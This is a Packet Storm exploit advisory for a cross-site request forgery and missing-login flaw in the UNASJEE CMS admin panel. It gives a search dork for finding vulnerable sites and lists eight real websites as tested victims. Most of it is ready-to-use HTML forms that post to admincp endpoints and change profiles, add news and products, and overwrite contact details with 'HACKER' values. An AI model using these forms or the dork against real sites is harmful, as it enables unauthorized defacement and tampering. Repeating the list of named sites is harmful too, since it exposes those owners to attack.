Unasjee CMS Cross Site Request Forgery

2015-03-24T00:00:00
ID PACKETSTORM:130978
Type packetstorm
Reporter KnocKout
Modified 2015-03-24T00:00:00

Description

                                        
                                            ` .__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \  
| Y \/ ^ /> <\ \_/ \ | \/\ ___/  
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/  
_____________________________   
/ _____/\_ _____/\_ ___ \  
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] HomePage : http://h4x0resec.blogspot.com  
############################################################  
Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu http://milw00rm.com / http://fiXen.org   
############################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : UNASJEE CMS  
|~Affected Version : All Version  
|~Vendor : http://www.unasjee.net/  
|~DORK : intext:Designed & Developed by: UNASJEE  
|~RISK : High  
|~Date: 22.03.2015  
|~Tested On : [L] Kali Linux  
####################INFO################################  
admin panel without login It is possible to post data  
the server will accept absolute.  
########################################################  
Demo and Tested on;  
http://turnnersports.com  
http://www.badhawaind.com  
http://www.cliftonintl.com  
http://www.aqnaf.com  
http://shanisports.com  
http://tayyabgarments.com  
http://www.shreentrader.com  
http://www.moosaleathers.com  
----------------------------------------------------------  
----------------------------------------------------------  
Change Profile Detai PoC  
----------------------------------------------------------  
  
<!-- Change Profile Detail -->  
<body>  
<form action="http://[TARGET]/admincp/updprofile.php" method="POST">  
<input type="hidden" name="pfid" value="1" />  
<input type="hidden" name="sFullDescription" value="HACKERRRRRRR" />  
<input type="hidden" name="p1" value="HACKERRRRRRR" />  
<input type="hidden" name="Submit" value="Submit" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
----------------------------------------------------------  
Add News PoC   
----------------------------------------------------------  
  
<form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();">  
<tr>   
<td valign="top" bgcolor="E8EEF3"><strong>  Title:   
</strong><span class="error">*</span> </td>  
<td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle">  
</td>  
</tr>  
<tr>   
<td valign="top" bgcolor="E8EEF3"><strong>  Date: </strong><span class="error">*</span></td>  
<td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate">  
 (YYYY-MM-DD)</td>  
</tr>  
<tr>   
<td width="25%" valign="top" bgcolor="E8EEF3"><strong>  News:<span class="error"> </span></strong><span class="error">*</span></td>  
<td width="75%" valign="top" bgcolor="E8EEF3">   
<textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3"> </td>  
<td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td>  
</tr>  
</form>  
</table></td>  
</tr>  
</table></td>  
</tr>  
<tr>   
<td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td>  
</tr>  
</table></td>  
</tr>  
</table></td>  
</tr>  
<tr>  
  
----------------------------------------------------------  
Add Products PoC   
----------------------------------------------------------  
  
  
<td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2">  
<form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();">  
<tr>   
<td width="29%" valign="top" bgcolor="E8EEF3">  <strong>Name:</strong></td>  
<td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName">   
 <font color="#FF0000">*</font></td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3">  <strong>Show:</strong></td>  
<td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr>   
<td width="6%"><input name="show" type="radio" value="y" checked></td>  
<td width="13%">Yes</td>  
<td width="5%"><input type="radio" name="show" value="n"></td>  
<td width="76%">No</td>  
</tr>  
</table></td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3"> <strong> Category   
Image:</strong></td>  
<td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile">   
 70 x 62 px</td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3"> </td>  
<td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td>  
</tr>  
</form>  
</table></td>  
</tr>  
</table></td>  
</tr>  
<tr>   
  
----------------------------------------------------------  
Change Contact Details PoC  
----------------------------------------------------------  
  
<form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" >  
<input type="hidden" name="cid" value="1">   
<table align=center width=525>  
<tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white">   
<td height="25" colspan=3><div align="center">Change   
your Contact Detail:</div></td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%" height="25" bgcolor="#CCCCCC">  First   
Contact Person:</td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Contact Person:</td>  
<td width="75%">   
<input name=cp1 type=text id="cp1" value="HACKER"></td>  
<td width="16"> </td>  
</tr>  
<tr>   
<td width="35%">Designation:</td>  
<td width="75%">  
<input name=cpd1 type=text id="cpd1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Mobile:</td>  
<td width="75%">  
<input name=cpm1 type=text id="cpm1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%" height="25" bgcolor="#CCCCCC">  Second   
Contact Person:</td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Contact Person:</td>  
<td width="75%">  
<input name=cp2 type=text id="cp2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Designation:</td>  
<td width="75%">  
<input name=cpd2 type=text id="cpd2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Mobile:</td>  
<td width="75%">  
<input name=cpm2 type=text id="cpm2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%" height="25" bgcolor="#CCCCCC"> Third   
Contact Person:</td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Contact Person:</td>  
<td width="75%">  
<input name=cp3 type=text id="cp3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Designation:</td>  
<td width="75%">  
<input name=cpd3 type=text id="cpd3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Mobile:</td>  
<td width="75%">  
<input name=cpm3 type=text id="cpm3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Phone I:</td>  
<td width="75%">  
<input name=ph1 type=text id="ph1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Phone II:</td>  
<td width="75%">  
<input name=ph2 type=text id="ph2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Phone III:</td>  
<td width="75%">  
<input name=ph3 type=text id="ph3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Fax I:</td>  
<td width="75%">  
<input name=fax1 type=text id="fax1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">E - Mail I:</td>  
<td width="75%">  
<input name=email1 type=text id="email1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">E - Mail II:</td>  
<td width="75%">  
<input name=email2 type=text id="email2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">E - Mail II:</td>  
<td width="75%">  
<input name=email3 type=text id="email3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Web Site:</td>  
<td width="75%">  
<input name=web type=text id="web" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>  
<td> </td>  
<td> </td>  
<td> </td>  
</tr>  
<tr>  
<td>Skype:</td>  
<td><input name=skype type=text id="skype" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td>Yahoo:</td>  
<td><input name=yahoo type=text id="yahoo" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td>gTalk:</td>  
<td><input name=gtalk type=text id="gtalk" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td>MSN:</td>  
<td><input name=msn type=text id="msn" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td> </td>  
<td> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"><div><strong>Asia Head Office Address:</strong></div>  
<br></td>  
<td width="75%">  
<textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"><strong>Hong Kong Office Address:</strong> </td>  
<td width="75%">  
<textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td>  
<td> </td>  
</tr>  
<tr>  
<td><strong>Australian Office Address:</strong></td>  
<td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%">  
<input type="submit" name="Submit" value="Submit">  
<input name="reset" type="reset" id="reset" value="Reset"></td>  
<td> </td>  
</tr>  
</table>  
  
</form>  
  
`